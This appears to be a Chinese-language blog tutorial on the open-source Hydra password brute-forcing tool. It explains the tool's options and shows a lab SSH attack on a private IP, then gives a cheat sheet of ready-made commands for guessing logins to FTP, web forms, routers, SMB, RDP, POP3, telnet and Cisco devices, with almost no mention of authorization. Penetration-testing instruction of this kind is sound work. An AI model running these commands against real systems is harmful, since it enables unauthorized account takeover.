九頭蛇hydra
大家都看過美國隊長吧
對大反派hydra組織還有印象嗎?
今天介紹的這款APP,也叫這個名字。
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiI9s2RkBnVHFmb1clWvB3MaVnRtp1XlBXe0xCMy81dvRWYoNHLwEzX5xCMx8FesU2cfdGLwMzX0xiRGZkRGZ0Xy9GbvNGLpZTY1EmMZVDUSFTU4VFRR9Fd4VGdsYTMfVmepNHLrJXYtJXZ0F2dvwVZnFWbp1zczV2YvJHctM3cv1Ce-cmbw5yNwkTO4UmMjJjZlZTNwIWZxYzXyQTMxMDMyIzLcFDMyIDMy8CXn9Gbi9CXzV2Zh1WavwVbvNmLvR3YxUjLyM3Lc9CX6MHc0RHaiojIsJye.png)
hydra是強力thc的一款開源的暴力破解工具
功能非常強大
kali下是預設安裝的,幾乎支援所有協定的線上破解。
能否暴力破解,最重要在于字典是否強大
還有電腦的性能足夠能跑
我們就介紹下,這個裝備怎麼用
使用方法
文法:Hydra 參數 IP 服務
參數:
-l login 小寫; 指定使用者 進行 破解
-L file 大寫,指定使用者的username字典
-p pass 小寫,用于指定密碼破解,很少使用,一般采用密碼字典。
-P file 大寫,用于指定密碼字典。
-e ns 額外的選項,n:空密碼試探,s:使用指定username和密碼試探
-M file 指定目标ip清單檔案,批量破解。
-o file 指定結果輸出檔案
-f 找到第一對登入名或者密碼的時候中止破解。
-t tasks 同時運作的線程數l預設是16
-w time 設定最大逾時時間,機關
-v / -V 顯示詳細過程
-R 恢複爆破(如果破解中斷了,下次執行 hydra -R /path/to/hydra.restore 就可以conitnue任務。)
-x 自定義密碼。
service:指定服務名,支援的服務跟協定有:telnet,ftp,pop3等等。
注意點:1.自己建立字典,然後放在目前的目錄下或者指定目錄。
2.參數可以統一放在最後,格式比如hydra ip 服務 參數。
3.如果能确定使用者名一項時候,比如web登入破解,直接用 -l就可以,然後剩餘時間破解密碼。
4.缺點,如果目标網站登入時候需要驗證碼就無法破解。
5.man hydra最萬能。
6.或者hydra -U http-form等檢視具體幫助。
案例分析
暴破ssh登入密碼
環境介紹
攻擊 :kali
hydra工具
靶機:192.168.154.131
ssh服務,正常運作
為了測試友善,我們建立兩個簡單的字典檔案,如下:
開始爆破
root@kali:/opt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh
破解成功
一篇文章總結暴力破解方法大全
測試登入
各種協定破解彙總
FTP協定破解
破解ftp:
hydra -L username字典 -P 密碼字典 -t 6 -e ns IP位址 -v
http協定破解
get方式送出,破解web登入:
hydra -L username -P 密碼字典 -t 線程 -v -e ns IP位址 http-get /admin/
hydra -L username -P 密碼字典 -t 線程 -v -e ns -f IP位址 http-get /admin/index.php
post方式送出,破解web登入:
hydra -f -l username -P 密碼字典 -V -s 9900 IP位址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …這個是登入的 url
#後門是POST的資料 其中的username 密碼使用 USER PASS 來代替
#然後是如果登入出錯 會出現的字元 。。。然後開始破解
https協定破解
破解https
hydra -m /index.php -l username -P 密碼字典.txt IP位址 https
路由器破解
hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 為嘗試破解的使用者名。
# -x 6:10:1a. 表示枚舉的密碼由 數字、小寫字母和單字元’.'等等組成,長度為 6 - 10 位。-t 8 表示分 8 個并行任務進行爆破嘗試。192.168.1.1 為 Router 位址。http-get 為破解方式(協定)
http-proxy協定破解
破解http-proxy:
hydra -l username -P 字典.txt http-proxy://IP位址
smb破解
破解smb:
hydra -l username字典 -P 密碼字典 IP位址 smb
Windows遠端桌面
破解rdp(windows遠端登入):
hydra ip位址 rdp -l administrator -P 密碼字典.txt -V
郵箱pop3
破解郵箱pop3:
hydra -l username -P 密碼字典.txt my.pop3.mail pop3
telnet破解
hydra ip位址 telnet -l username字典.txt -P 密碼字典.txt -t 32 -s 23 -e ns -f -V
語音通訊工具teamspeak
hydra -l 使用者名字典 -P 密碼字典.txt -s 端口号 -vV ip teamspeak
cisco
hydra -P 密碼字典 IP位址 cisco
hydra -m cloud -P 密碼字典 IP位址 cisco-enable